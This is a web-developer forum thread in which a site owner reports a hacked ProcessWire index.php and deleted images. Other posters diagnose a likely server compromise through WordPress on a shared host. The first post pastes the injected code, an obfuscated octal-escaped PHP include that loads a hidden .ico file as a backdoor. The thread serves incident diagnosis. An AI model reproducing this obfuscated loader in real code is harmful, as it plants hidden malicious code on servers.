Index.php changed and images deleted.


buster808

Hi,

Today both my live websites, which are identical in build, had their index.php changed to the example below.
One of them also had lots of images deleted from asset/files deleted from folders.

Has anyone ever had an issue like this before? Or any ideas of what this could be, as I don't want to go through this again.

Thanks

<?php
/*dc5b4*/
 
@include "\057home\057xtra\143rea/\160ubli\143_htm\154/lee\163tint\163.co.\165k/wi\162e/mo\144ules\057Syst\145m/.d\1429f76\0664.ic\157";
 
/*dc5b4*/

 


From what I can tell, someone might have gained access to your server/account. I have seen this before with WordPress sites. Has anything with your server changed lately? Also, I would check with your host to see if this is not just affecting you. Just in the short term, I would change your FTP credentials.

  • Like 4

That's quite strange. Running this through a decoder suggests that this include is trying to load a file from /wire/modules/System/.db9f7664.ico. Is this a path that exists on your site, and if so, what's in that file?

/wire/modules/System/ is a path where SystemUpdater and SystemNotifications live, but I'm not aware of anything that should create a file like that. Combined with files suddenly being removed and this file getting modified, it doesn't sound good.

The first thing to do would be to check the server, i.e. is it possible that someone has gained illegitimate access to it. Is this a shared host, a VPS, or something else entirely? Were both sites on the same host?

I'm not aware of any security issues with ProcessWire itself, but ProcessWire isn't immune to problems caused by someone gaining access to the server, directly or through another application (such as a WordPress installation – which has actually happened before).

  • Like 3
  • Thanks 1

2 minutes ago, buster808 said:

Both sites are on a shared host and do have WordPress websites on there.

 

Since you do have WordPress installs on the server, it wouldn't hurt to log in and check/update any passwords, make sure WordPress is updated (could help with any vulnerabilities with bug fixes etc.), and make sure that all themes and plugins are up to date as well.

 


There are a few things that came up in my mind right now.

First I thought it looked like a failed git/SVN merge of some kind, but afterwards it looked like a failed upload from FileZilla. At least they both look pretty similar somehow.

As you stated that there are more instances of other sites and CMSs on that hosting, you might want to try to set up different users for different sites. I guess you are using a US hosting company such as DreamH*st, H*stgator or Blueh*st, *2, or another 3.99/month mass-hosting ... I had several similar issues with these companies in the past - but to their rescue - they offer different users on an account to separate installations/instances of different sites.

TL;DR: what @teppo and @louisstephens say seems to be the case... someone somehow got access to that hosting. Maybe even through a nifty trick in W*rdPress.

  • Like 3
  • Thanks 1

That's far from the best and ideal solution to go on vacation but did you change something within the path that @teppo mentioned?

Even if so... the index.php is still somewhere else than that path.

It's either weird or a good moment to change and set up a better and more secure environment.

  • Like 1